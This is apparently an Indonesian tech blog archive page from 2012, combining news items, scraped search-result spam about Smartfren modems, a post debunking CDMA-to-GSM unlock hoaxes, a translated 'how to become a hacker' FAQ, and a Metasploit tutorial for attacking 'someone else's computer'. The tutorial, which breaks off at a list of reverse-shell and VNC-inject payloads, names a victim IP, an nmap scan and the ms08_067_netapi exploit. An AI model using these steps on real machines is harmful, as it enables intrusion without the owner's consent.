Ini Dia, 10 Versi Windows 8 Terbaru

Menurut Microsoft, sudah lebih dari 1 juta orang telah men-download software Windows 8 Consumer Preview.

Minggu, 09 Desember 2012

Perusahaan Teknologi Terbesar Dunia Bergabung untuk Membuat Situs Penyedia Standar Teknologi Web

Perusahaan teknologi terbesar dunia, baru saja bergabung untuk turut serta dalam upaya memberikan penjelasan definitif untuk teknologi web. Perusahaan-perusahaan besar seperti Google, Apple, Microsoft, HP, Mozilla, Adobe, Nokia dan Opera baru saja menyertakan diri bersama W3C untuk meluncurkan situs baru bernama Web Platform.


Situs ini akan memberikan sumber informasi berkualitas dan up to date mengenai HTML5, CSS3, serta standar web lainnya. Dengan adanya standar tersebut, para perusahaan tersebut berharap dapat memberikan peningkatan teknologi web di dunia.

W3C mengatakan bahwa wsitus tersebut juga akan menampilkan status dari standardisasi teknologi tertentu dan implementasinya dalam berbagai jenis browser. Situs ini pun memiliki cara kerja seperti Wiki, di mana masing-masing perwakilan anggota bisa menginformasikan hal terbaru dalam situs tersebut.

Semua dokumen yang ada di situs ini akan memiliki lisensi creative common. Selain itu, para pengunjung situs ini juga didorong untuk sharing kode, tips dan trik atau informasi yang berkaitan dengan teknologi web.

(Via The Next Web)

Rabu, 31 Oktober 2012

Google Geser Microsoft Sebagai Perusahaan Teknologi Terbesar Nomor 2

Google secara mengejutkan akhirnya bisa menggeser posisi Microsoft sebagai perusahaan teknologi terbesar kedua setelah Apple. Kabar tersebut dilansir Bloomberg kemarin.


Kabar naiknya Google di posisi kedua sebagai perusahaan teknologi besar dunia memang sangat mengejutkan. Sebagaimana kita ketahui, Microsoft dan Apple selalu bersaing dalam kapitalisasi pasar beberapa tahun silam.

Dan kini Google seolah membuktikan bahwa langkah mereka membuat os untuk smartphone dan tablet berujung dengan kesuksesan. Tidak mustahil juga jika akhirnya Google akan menggeser posisi Apple di puncak pada beberapa tahun mendatang.

Kedigdayaan Google sebenarnya banyak disumbang pendapatan iklan dari search engine, lalu royalti untuk os android yang kini jumlahnya mencapai lebih dari separuh populasi smartphone di seluruh dunia.

Data terakhir menunjukan kapitalisasi pasar Google mencapai 249 milyar US Dollar. Sedangkan Microsoft hanya meraup 248.8 milyar US Dollar. Walaupun terbilang sangat tipis perbedaannya, namun ini merupakan tonggak sejarah bagi Google untuk bisa mendominasi di waktu-waktu yang akan datang.

Sementara Apple sendiri bisa dibilang melesat sendirian di urutan pertama dan jauh meninggalkan jumlah kapitalisasi pasar yang diperoleh Google dan Microsoft. Bahkan jika digabung nilai keduanya pun, Apple tetap tak tertandingi.

Apple saat ini meraup nilai 632 milyar US Dollar. Perusahaan teknologi asal Cupertino tersebut nilai sahamnya pun mengalahkan produsen minyak terbesar dunia saat ini yaitu Exxon Mobil. Sebuah capaian yang fantastis.

Selasa, 30 Oktober 2012

Silahkan tinggalkan comment.... :)

Tips Meng Unlock Modem Smart Ce682 | Natural Therapy
Alexa Traffic Rank for http://naturaterapi.com/tips-meng-unlock-modem-smart-ce682/: 175,896naturaterapi.com/tips-meng-unlock-modem-smart-ce682/

22 Jun 2012 - Terapi Tidur Tips modem cara unlock modem smart ce682 BUKAN CARA MENG KOMPUTER ORANG UNTUK BAHAN Saya pakai internet dari usb modem ...

Tips Pake Modem Smart Rev a | Natural Therapy

Alexa Traffic Rank for http://naturaterapi.com/tips-pake-modem-smart-rev-a/: 175,896naturaterapi.com/tips-pake-modem-smart-rev-a/

3 hari yang lalu - Beda rev a dan rev b agar smartfren stabil menambah kecepatan smart evdo tips smart evdo sekdar berbagiawalx sy ragu pake modem smart ac682 krn bnyak .

Meningkatkan Kecepatan Modem Smart Ce682 - Jual Beli Kaskus Online

Alexa Traffic Rank for http://www.universalforum.info/2012/thread/meningkatkan-kecepatan-modem-smart-ce682.html: 41,237www.universalforum.info › Lapak

1 hari yang lalu - akan berbagi sedikit tips untuk meningkatkan kecepatan ... User name: smart Password: smart. Untuk ... cara mempercepat koneksi modem smartfren ce682, ...

cara mempercepat download modem smart ce682 | Checkidot.COM

Alexa Traffic Rank for http://checkidot.com/22239/cara-mempercepat-download-modem-smart-ce682/: 2,192,035checkidot.com/.../cara-mempercepat-download-mod... - Amerika Serikat

15 Jun 2012 - Free cara mempercepat modem smart downloads Collection of cara mempercepat modem smart freeware shareware download STOIK Smart Resizer Dialgo ...

Cara Mempercepat Koneksi Smart Ce682 - Jual Beli Kaskus Online

Alexa Traffic Rank for http://www.universalforum.info/2012/thread/cara-mempercepat-koneksi-smart-ce682.html: 41,237www.universalforum.info › Lapak

Diulas oleh Angga Sanusi

21 Jun 2012 - User name: smart Password: smart. Untuk cara membuat profil internet baru bisa ... cara mempercepat koneksi modem smartfren, cara mempercepat koneksi ...

cara mempercepat koneksi modem smart ce682 | Checkidot.COM

Alexa Traffic Rank for http://checkidot.com/21698/cara-mempercepat-koneksi-modem-smart-ce682/: 2,192,035checkidot.com/.../cara-mempercepat-koneksi-modem... - Amerika Serikat

6 Jun 2012 - Free cara mempercepat modem smart downloads Collection of Free Cara Mempercepat Modem Smart Cara Mempercepat Modem Cdma Mempercepat ...

Cara Unlock Modem Smart Ac2726i - Jual Beli Kaskus Online

Alexa Traffic Rank for http://www.universalforum.info/2012/thread/cara-unlock-modem-smart-ac2726i.html: 41,237www.universalforum.info › Lapak

6 hari yang lalu - lapak terbaru cara unlock modem smart ac2726i 0 at http://www.universalforum.info . Jual beli kaskus online adalah tempat lapak terbaru yang tersedia di jual ...

Cara Mempercepat Modem Smart Ce682 - Jual Beli Kaskus Online

Alexa Traffic Rank for http://www.universalforum.info/2012/thread/cara-mempercepat-modem-smart-ce682.html: 41,237www.universalforum.info › Lapak

Diulas oleh Angga Sanusi

20 Jun 2012 - lapak terbaru cara mempercepat modem smart ce682 0 at http://www.universalforum.info . Jual beli kaskus online adalah tempat lapak terbaru yang tersedia di ...

Cara Jebol Quota Smart Fren | Tips dan Trik

Alexa Traffic Rank for http://sibolang.net/artikel/cara-jebol-quota-smart-fren.html: 255,862sibolang.net/artikel/cara-jebol-quota-smart-fren.html

1 hari yang lalu - Hasil Pencarian dari artikel yang Anda Cari cara jebol quota smart fren . ... smart tips unlock modem aha huawei ec167 cara jebol quota modem tagihan atau ...

Tips Mempercepat Koneksi Modem Smart Ce682 | Natural Therapy

Alexa Traffic Rank for http://naturaterapi.com/tips-mempercepat-koneksi-modem-smart-ce682/: 175,896naturaterapi.com/tips-mempercepat-koneksi-modem-smart-ce682/

9 Jun 2012 - Terapi Herbal Terapi Jus Terapi Manula Terapi Puasa Terapi Tidur Tips CE682 Setting DNS Modem Smartfren Ce682 Cara Instal Modem Smartfren CE682 ...




Cara Setting Modem Smart Ac2726 Ui Nurlitas Blog | Car Navigation

Alexa Traffic Rank for http://www.eiamalta.com/cara/cara-setting-modem-smart-ac2726-ui-nurlitas-blog.html: 901,669www.eiamalta.com/.../cara-setting-modem-smart-ac2726-ui-nurlitas-...

22 Jun 2012 - Smart Modem Blogs Smart Modem Zte Router Android . Top User Searches Zte Internet Modem Albenia Paket Unlimited Smart Evdo Cara Setting Cara Setting ...

Cara Menstabilkan Koneksi Modem Smartfren Ac 682 Keyword Stats

Alexa Traffic Rank for http://www.mobipdf.com/cara/cara-menstabilkan-koneksi-modem-smartfren-ac-682-keyword-stats.pdf: 134,929www.mobipdf.com/.../cara-menstabilkan-koneksi-modem-smartfren-...

11 Jun 2012 - tips mempercepat Koneksi Internet Modem SMART EVDO smart evdo,mempercepat smart evdo, mempercepat koneksi Tips Untuk Research Keyword Adsense ...

Software Untuk Mempercepat Modem Smart Evdo Ce682 Rev A ...

Alexa Traffic Rank for http://bacakata.com/baca-software-untuk-mempercepat-modem-smart-evdo-ce682-rev-a.html: 255,669bacakata.com/baca-software-untuk-mempercepat-modem-smart-evdo...

9 Jun 2012 - Teknik Mengoptimalkan Koneksi SMART Rev A EVDO Blogger Kampungan ... modem smart evdo; software ... bts smart jogja; cara mempercepat modem evdo ... smart ... Tips-Tips. Trik Internet Gratis XL Update Terbaru 10 Januari 2012 · Trik ...

Cara Mempercepat Koneksi Internet Smart Evdo | Health News and ...

Alexa Traffic Rank for http://www.healthity.info/cara/cara-mempercepat-koneksi-internet-smart-evdo.html: 425,830www.healthity.info/.../cara-mempercepat-koneksi-internet-smart-evd...

23 Jun 2012 - Cara Mempercepat Koneksi Internet Smart Evdo. Tips mempercepat internet smart evdo, pengguna internet smart baik smart unlimited modem Evdo koneksi ...

Cara Install Modem Haier D1200p Smart Telecom Nada Sumbang ...

Alexa Traffic Rank for http://www.mobipdf.com/cara/cara-install-modem-haier-d1200p-smart-telecom-nada-sumbang.pdf: 134,929www.mobipdf.com/.../cara-install-modem-haier-d1200p-smart-teleco...

9 Jun 2012 - IT Freelance, Wireless Networking and Graphic Designer Sebelumnya saya pernah menulis tentang cara install modem haier D1200P untuk smart telecom.

Cara Setting Modem Hp Smart Zte C261 Haier C700 Di Linux

Alexa Traffic Rank for http://www.erwinmiradi.com/cara/cara+setting+modem+hp+smart+zte+c261+haier+c700+di+linux.htm: 88,396www.erwinmiradi.com › Cara

10 Jun 2012 - Direktori bacaan dengan kategori 'Cara' 2012/06/10 dengan kata kunci cara setting modem hp smart zte c261 haier c700 di linux ditemukan pada halaman ...

Trik Gratis Modem Smart Fren Terbaru 2012 Pc - pulsa jaya reload net

Alexa Traffic Rank for http://www.pulsajayareload.net/search/trik-gratis-modem-smart-fren-terbaru-2012-pc/: 567,281www.pulsajayareload.net/.../trik-gratis-modem-smart-fren-terbaru-20...

5 hari yang lalu - Trik Internet Gratis Three Update 27 Juni 2012 – Tips Internet Gratis Three 27 Juni ... Informasi Komunikasi (TIK) bagi guru berupa bantuan 2.000 modem gratis, ...

modem smart ac2726i sby - kaskus networking communications

Alexa Traffic Rank for http://kaskusnetworkingcommunications.pitoong.com/?p=1807: 42,881kaskusnetworkingcommunications.pitoong.com/?p=1807

12 Jun 2012 - Archive Internet Smart Problem Solution Tips Trick. gw kan baru pake modem smart Ev-Do AC2726 ... misi saya mw tanya ada ga user sby ... Gan apa beda nya ...

Cara Memberhentikan Langganan Paket Internet Satu Bulan ...

Alexa Traffic Rank for http://www.pulsajayareload.net/search/cara-memberhentikan-langganan-paket-internet-satu-bulan-modem-smart/: 567,281www.pulsajayareload.net/.../cara-memberhentikan-langganan-paket-i...

1 hari yang lalu - Tri juga meluncurkan Paket Modem HSDPA yang dibundling dengan kartu Tri khusus data seharga Rp 680.000 (termasuk PPN). Tabel untuk mengetahui cara ...

Tips Dan Trik Mempercepat Internet Smart Haier C700 Just | Best ...

Alexa Traffic Rank for http://www.ipodportal.com/tips/tips-dan-trik-mempercepat-internet-smart-haier-c700-just-.html: 4,438,942www.ipodportal.com/tips/tips-dan-trik-mempercepat-internet-smart-h...

18 Jun 2012 - TUTORIAL | TIPS DAN TRIK REVIEW INTERNET SMART; SMART HAIER D1200P; SMART HAIER C700 koneksi EVDO, Mempercepat koneksi internet, modem ...

Cara Unlock Modem CDMA Smartfren CE682 Ke GSM


Code division multiple access (CDMA) adalah sebuah bentuk pemultipleksan (bukan sebuah skema pemodulasian) dan sebuah metode akses secara bersama yang membagi kanal tidak berdasarkan waktu (seperti pada TDMA) atau frekuensi (seperti pada FDMA), namun dengan cara mengkodekan data dengan sebuah kode khusus yang diasosiasikan dengan tiap kanal yang ada dan menggunakan sifat-sifat interferensi konstruktif dari kode-kode khusus itu untuk melakukan pemultipleksan.

Dalam perkembangan teknologi telekomunikasi telepon selular terutama yang berkaitan dengan generasi ke-tiga (3G), CDMA menjadi teknologi pilihan masa depan.

CDMA juga mengacu pada sistem telepon seluler digital yang menggunakan skema akses secara bersama ini,seperti yang diprakarsai oleh Qualcomm.

CDMA adalah sebuah teknologi militer yang digunakan pertama kali pada Perang Dunia II oleh sekutu Inggris untuk menggagalkan usaha Jerman mengganggu transmisi mereka. Sekutu memutuskan untuk mentransmisikan tidak hanya pada satu frekuensi, namun pada beberapa frekuensi, menyulitkan Jerman untuk menangkap sinyal yang lengkap.

Sejak itu CDMA digunakan dalam banyak sistem komunikasi, termasuk pada Global Positioning System (GPS) dan pada sistem satelit OmniTRACS untuk logistik transportasi. Sistem terakhir didesain dan dibangun oleh Qualcomm, dan menjadi cikal bakal yang membantu insinyur-insinyur Qualcomm untuk menemukan Soft Handoff dan kendali tenaga cepat, teknologi yang diperlukan untuk menjadikan CDMA praktis dan efisien untuk komunikasi seluler terrestrial.

Global System for Mobile Communication disingkat GSM adalah sebuah teknologi komunikasi selular yang bersifat digital. Teknologi GSM banyak diterapkan pada komunikasi bergerak, khususnya telepon genggam. Teknologi ini memanfaatkan gelombang mikro dan pengiriman sinyal yang dibagi berdasarkan waktu, sehingga sinyal informasi yang dikirim akan sampai pada tujuan. GSM dijadikan standar global untuk komunikasi selular sekaligus sebagai teknologi selular yang paling banyak digunakan orang di seluruh dunia.

Teknologi komunikasi selular sebenarnya sudah berkembang dan banyak digunakan pada awal tahun 1980-an, diantaranya sistem C-NET yang dikembangkan di Jerman dan Portugal oleh Siemens, sistem RC-2000 yang dikembangkan di Perancis, sistem NMT yang dikembangkan di Belanda dan Skandinavia oleh Ericsson, serta sistem TACS yang beroperasi di Inggris. Namun teknologinya yang masih analog membuat sistem yang digunakan bersifat regional sehingga sistem antara negara satu dengan yang lain tidak saling kompatibel dan menyebabkan mobilitas pengguna terbatas pada suatu area sistem teknologi tertentu saja (tidak bisa melakukan roaming antar negara).

Teknologi analog yang berkembang, semakin tidak sesuai dengan perkembangan masyarakat Eropa yang semakin dinamis, maka untuk mengatasi keterbatasannya, negara-negara Eropa membentuk sebuah organisasi pada tahun 1982 yang bertujuan untuk menentukan standar-standar komunikasi selular yang dapat digunakan di semua negara Eropa. Organisasi ini dinamakan Group Special Mobile (GSM). Organisasi ini memelopori munculnya teknologi digital selular yang kemudian dikenal dengan nama Global System for Mobile Communication atau GSM.

Lihat Video Hoax Unlock Modem CDMA Smartfren ce682 Ke GSM



Dan ini adalah artikel cara unlock modem cdma ke gsm yang tidak pernah terbukti kebenarannya:
Sekarang ini banyak produsen modem pada bermunculan.
mereka masing-masing mempromosikan produk mereka.
tetapi rata-rata produk yang ditawarkan merupakan produk sejenis (dalam arti misalnya hanya modem kartu tertentu atau modem cuma untuk kartu GSM atau CDMA aja.
padahal masyarkat pengguna modem memerlukan modem yang bisa semua operator baik GSA maupun CDMA.

disini terdapat cara untuk mengunlock beberapa modem agar bisa digunakan untuk all operator GSM dan CDMA.

@ unlock mdem kartu GSM
1. masukkan kartu lain kedalam modem (misalnya smart)
2. kunjungi link berikut untuk mengunlock modem huawei
3. kunjungi link berikut untuk mengunlock modem ZTE

Seperti di jelaskan di atas Code division multiple access (CDMA) adalah sebuah bentuk pemultipleksan (bukan sebuah skema pemodulasian) dan sebuah metode akses secara bersama yang membagi kanal tidak berdasarkan waktu

Begitu juga Global System for Mobile Communication disingkat GSM adalah sebuah teknologi komunikasi selular yang bersifat digital, Teknologi ini memanfaatkan gelombang mikro dan pengiriman sinyal yang dibagi berdasarkan waktu

Dari system aja sudah beda jadi cara unloack modem CDMA ke GSM di atas tidak mungkin bisa, Salah satu cara biar modem smartfren bisa pake IM3, Mentari, XL, Simpati, As, Three, & Axis sablon dulu kartu smartfren atau kartu CDMA lain dengan gambar kartu GSM yang kamu inginkan

Minggu, 14 Oktober 2012

CARA MENJADI HACKER


Baiklah untuk tutorial saya yang kali ini saya akan memberikan anda cara untuk menjadi seorang hacker yang sukses, untuk menjadi seorang hacker yang berhasil ada beberapa hal yang harus anda kerjakan.
Yang pertama, Anda harus memiliki minat dan rasa ingin tahu yang mendalam pada bidang ini, karena tanpa ada rasa kemauan yang dalam pada bidang ini, adalah suatu hal yang mustahil bagi kita untuk mengerjakan apa yang kita tidak suka, benar tidak teman-teman. Tapi jelas Anda harus banyak banyak menambah ilmu Anda, karena kalau anda hanya mempunyai minat tapi anda tidak mau berusaha apa gunanya.
Yang kedua, banyak-banyaklah membaca karena dengan membaca Anda dapat memperluas pengetahuan Anda lebih dalam lagi sehingga anda dengan cepat dapat menjadi seorang hacker.
Yang ketiga Anda harus menguasai bahasa inggris atau paling tidak anda mengerti arti dari tulisan inggris karena kita ketahui program-program yang ada sekrang ini, menggunakan bahasa inggris untuk interfacenya dengan pengguna.
Yang keempat Anda harus dapat membuat penemuan anda sendiri anda tidak boleh hanya bergantung pada orang lain, karena seorang hacker harus yakin dan percaya pada dirinya sendiri. Dan yang terakhir adalah jika nanti Anda sudah menjadi seorang hacker, manfaatkanlah ilmu anda untuk kepentingan bersama, bukan hanya untuk menghancurkan tapi untuk membangaun, bukannya begitu …Yes!!
Tapi tolong jangan salah sangak dulu tutor ini bukan berarti saya sudah lebih pintar dari teman-teman TIDAK…….merasa sok hebat untuk meng-gurui teman2, ini hanyalah apresiasi terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun secaragaris besar meniru artikel “HOW TO BECOME A HACKER” oleh kang “eric S R ” dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.
Tulisan ini pun sudah ditambahi beberapa pertanyaan yang sering dipertanyakan. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-referke artikel ini.
[F.A.Q]
T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system, komputer, atau jaringan komputer.”
T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri. Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu, mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang mereka ketahui
Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada hacker yang Anda jumpai.
Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat, ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono dalam berpikir sehingga tidak cocok menjadi hacker — karena itu usahakanlah mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik, atau Anda tidak akan diacuhkan.
Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan orang-orang ini biasanya pencuri yang memakai account curian, dan kami tidak berminat menghargai pencuri
T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!
T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet
T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting Ingat semua itu perlu proses!
T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com
T : Untuk programing ?
J : Mungkin yang terpenting adalah ‘logika’ pemrograman , jadi lebih kearah pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat disarankan belajar pemrograman yang masih menomer satukan logika/murni
T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya ) (*ini murni pengalaman pribadi)
T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh dari bahasa pemrograman yang akan anda pelajari , Cari dan install software yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram walaupun program yang simple, dan kamu tidak di “haramkan” untuk mengetik ulang program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb ) , sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.
T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor. Menerima situasi monopoli seperti itu bukanlah cara hacker.
T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika. Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool, teori himpunan hingga, kombinasi, dan teori graph) berguna.
T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya
T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih familiar ke programing secara penuh
T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ? karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating system , kenali dan akrabkan diri
T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar dikarenakan sifat “open source”
T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu
T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga dengan mandrake tetapi aku lebih comfort dengan redhat.
T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell
T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu banyak situs penyedia jasa yang dapat membantu kamu
T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset dsb, jadi ada baiknya kamu memilikinya agar dapat langsung menyalurkan semua ide dan pemikiran kamu Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk bereksplorasi dan mencoba tanpa takut merusak dsb
T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif “murah” (mohon maaf buat yang masih belum mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan
T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif
T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda. Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar dan menyempurnakan keahlian.
T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools semua orang juga bisa!!
T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.
T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok
T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai kebalikan dari ‘hacker’, dan biasanya mencari keuntungan dalam memasuki suatu sistem
T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain yang setidaknya dirancang untuk keamanan.
T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )
T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com
Semoga bermanfaat.

Cara Kill Komputer Orang Lain Dengan Metasploit

1.Metasploit versi berapa z, karena sekarang udah versi 3.3 maka kita akan
memakai versi baru tersebut tool ini bisa di download di http://metasploit.com


2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren )


3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya


4.Ip dari komputer korban ( 192.168.2.78)


5.mau nyiapin apa z terserah dehh


pertama install metasploitnya, klo di mikocok tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya


./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)


klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).


pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc teman, klo gw sih sering maku
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya


( simulation on Mikocok )
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit


____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *




=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 452 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7628 updated 6 d


msf >


kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap


nmap -v -O -p445 192.168.2.87


command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya


ketikan di jendela msf(metasploit)


show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan


karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah


dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show PAYLOAD


TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager




